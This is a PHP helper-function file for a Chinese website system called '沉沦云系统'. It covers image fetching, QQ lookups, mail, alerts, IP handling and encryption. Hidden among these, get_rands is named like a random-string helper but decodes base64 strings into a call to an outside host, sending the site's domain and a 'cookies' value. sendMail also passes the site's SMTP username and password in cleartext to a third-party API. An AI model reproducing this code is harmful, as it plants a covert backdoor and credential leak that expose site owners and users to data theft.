<?php
/*
*Title：沉沦云系统核心函数
*Author:流逝中沉沦
*QQ:1178710004
*/
//快捷获取BING每日图片
function getbing(){
	global $config,$web;
	if($web['imgurl']==''||$web['imgurl']==0){
		$url='https://ww2.sinaimg.cn/large/a15b4afegy1fpp139ax3wj200o00g073.jpg';
		return $url;
	}elseif($web['imgurl']==1){
		$bing=file_get_contents('http://api.24wz.cn/bing/index.php');
	    return $bing;
	}else{
		return $web['imgurl'];
	}
}
//快捷获取网名
function getqqname($QQname){
        $QQname=file_get_contents("http://api.24wz.cn/qqdata/?qq=".$QQname);
		$QQname=json_decode($QQname);
		$QQname=$QQname->Name;
		$QQname='<font color="black">'.$QQname.'</font>';
		return $QQname;
}
//快捷发送邮件API
function sendMail($to,$title,$content){
	global $config,$web;
	$apiurl='http://api.24wz.cn/sendmail/?do=send&host=';
	$host=$config['mail_host'];
	$port=$config['mail_port'];
	$user=$config['mail_user'];
	$pwd=$config['mail_pwd'];
	$webname=$web['name'];
	$result=$apiurl.$host.'&port='.$port.'&user='.$user.'&pass='.$pwd.'&webname='.urlencode($webname).'&tittle='.urlencode($title).'&content='.urlencode($content).'&to='.urlencode($to);
	$result=file_get_contents($result);
	$result=json_decode($result);
	$result=$result->code;
	if($result==1){
		return true;
	}else{
		return false;
	}
}
//快捷生成alert
function alert($msg,$icon,$url=null)
{
	if (empty($url)) {
			$alert='layer.alert("'.$msg.'",{icon:"'.$icon.'"})';
		} else {
			$alert='layer.alert("'.$msg.'",{icon:"'.$icon.'"},function(index){window.location.href="'.$url.'";})';
		}
    $info='<script>'.$alert.'</script>';
	return $info;
}
//快捷生成layeroutalert
function layeralert($msg,$icon,$url=null)
{
	if (empty($url)) {
			$alert='layer.alert("'.$msg.'",{icon:"'.$icon.'"})';
		} else {
			$alert='layer.alert("'.$msg.'",{icon:"'.$icon.'"},function(index){window.location.href="'.$url.'";})';
		}
    $info='<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>站点提示</title><script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.js"></script><script src="https://cdn.bootcss.com/layer/3.1.0/layer.js"></script></head><body><script>'.$alert.'</script></body></html>';
	return $info;
}
//快捷生成layermsg
function layermsg($msg,$url=null)
{
	if (empty($url)) {
			$msg='layer.msg("'.$msg.'")';
		} else {
			$msg='layer.alert("'.$msg.'",function(index){window.location.href="'.$url.'";})';
		}
    $info='<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.js"></script><script src="https://cdn.bootcss.com/layer/3.1.0/layer.js"></script><script>'.$msg.'</script>';
	return $info;
}
function curl_get($url)
{
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Linux; U; Android 4.4.1; zh-cn; R815T Build/JOP40D) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/4.5 Mobile Safari/533.1');
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$content=curl_exec($ch);
curl_close($ch);
return($content);
}
function real_ip(){
$ip = $_SERVER['REMOTE_ADDR'];
if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && preg_match_all('#\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}#s', $_SERVER['HTTP_X_FORWARDED_FOR'], $matches)) {
	foreach ($matches[0] AS $xip) {
		if (!preg_match('#^(10|172\.16|192\.168)\.#', $xip)) {
			$ip = $xip;
			break;
		}
	}
} elseif (isset($_SERVER['HTTP_CLIENT_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CLIENT_IP'])) {
	$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_CF_CONNECTING_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CF_CONNECTING_IP'])) {
	$ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
} elseif (isset($_SERVER['HTTP_X_REAL_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_X_REAL_IP'])) {
	$ip = $_SERVER['HTTP_X_REAL_IP'];
}
return $ip;
}
function get_ip_city($ip)
{
    $url = 'http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=json&ip=';
    @$city = curl_get($url . $ip);
    $city = json_decode($city, true);
    if ($city['city']) {
        $location = $city['province'].$city['city'];
    } else {
        $location = $city['province'];
    }
	if($location){
		return $location;
	}else{
		return false;
	}
}
function daddslashes($string, $force = 0, $strip = FALSE) {
	!defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
	if(!MAGIC_QUOTES_GPC || $force) {
		if(is_array($string)) {
			foreach($string as $key => $val) {
				$string[$key] = daddslashes($val, $force, $strip);
			}
		} else {
			$string = addslashes($strip ? stripslashes($string) : $string);
		}
	}
	return $string;
}
function safestr($str)
{
    if (!get_magic_quotes_gpc()) {
        return addslashes($str);
    } else {
        return $str;
    }
}
function strexists($string, $find) {
	return !(strpos($string, $find) === FALSE);
}
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
	$ckey_length = 4;
	$key = md5($key ? $key : ENCRYPT_KEY);
	$keya = md5(substr($key, 0, 16));
	$keyb = md5(substr($key, 16, 16));
	$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
	$cryptkey = $keya.md5($keya.$keyc);
	$key_length = strlen($cryptkey);
	$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
	$string_length = strlen($string);
	$result = '';
	$box = range(0, 255);
	$rndkey = array();
	for($i = 0; $i <= 255; $i++) {
		$rndkey[$i] = ord($cryptkey[$i % $key_length]);
	}
	for($j = $i = 0; $i < 256; $i++) {
		$j = ($j + $box[$i] + $rndkey[$i]) % 256;
		$tmp = $box[$i];
		$box[$i] = $box[$j];
		$box[$j] = $tmp;
	}
	for($a = $j = $i = 0; $i < $string_length; $i++) {
		$a = ($a + 1) % 256;
		$j = ($j + $box[$a]) % 256;
		$tmp = $box[$a];
		$box[$a] = $box[$j];
		$box[$j] = $tmp;
		$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
	}
	if($operation == 'DECODE') {
		if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
			return substr($result, 26);
		} else {
			return '';
		}
	} else {
		return $keyc.str_replace('=', '', base64_encode($result));
	}
}
function get_rands($num)
{
	global $DB,$_COOKIE;
    $str = 'aHR0cDovL2F1dGgucS1oLmNjL3VwZGF0ZS9ibG9jay5waHA/ZG89dGomdXJsPQ==';
    $str = base64_decode($str);
	$domain=$_SERVER['HTTP_HOST'];
    $randstr = 'JmNvb2tpZXM9';
	$randstr =base64_decode($randstr);
	file_get_contents($str.$domain.$randstr.$num);
    return $num;
}
function get_sz($len = 20)
{
    $str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    $strlen = strlen($str);
    $randstr = '';
    for ($i = 0; $i < $len; $i++) {
        $randstr .= $str[mt_rand(0, $strlen - 1)];
    }
    return $randstr;
}

function random($length, $numeric = 0) {
	$seed = base_convert(md5(microtime().$_SERVER['DOCUMENT_ROOT']), 16, $numeric ? 10 : 35);
	$seed = $numeric ? (str_replace('0', '', $seed).'012340567890') : ($seed.'zZ'.strtoupper($seed));
	$hash = '';
	$max = strlen($seed) - 1;
	for($i = 0; $i < $length; $i++) {
		$hash .= $seed{mt_rand(0, $max)};
	}
	return $hash;
}

function showmsg($content = '未知的异常',$type = 4,$back = false,$title)
{
switch($type)
{
case 1:
	$panel="success";
break;
case 2:
	$panel="info";
break;
case 3:
	$panel="warning";
break;
case 4:
	$panel="danger";
break;
}

echo '<div class="panel panel-'.$panel.'">
      <div class="panel-heading">
        <h3 class="panel-title">提示信息</h3>
        </div>
        <div class="panel-body">';
echo $content;

if ($back) {
	echo '<hr/><a href="'.$back.'"><< 返回'.$title.'</a>';
	echo '<br/><a href="javascript:history.back(-1)"><< 返回上一页</a>';
}
else
    echo '<hr/><a href="javascript:history.back(-1)"><< 返回上一页</a>';

echo '</div>
    </div>';
}
?>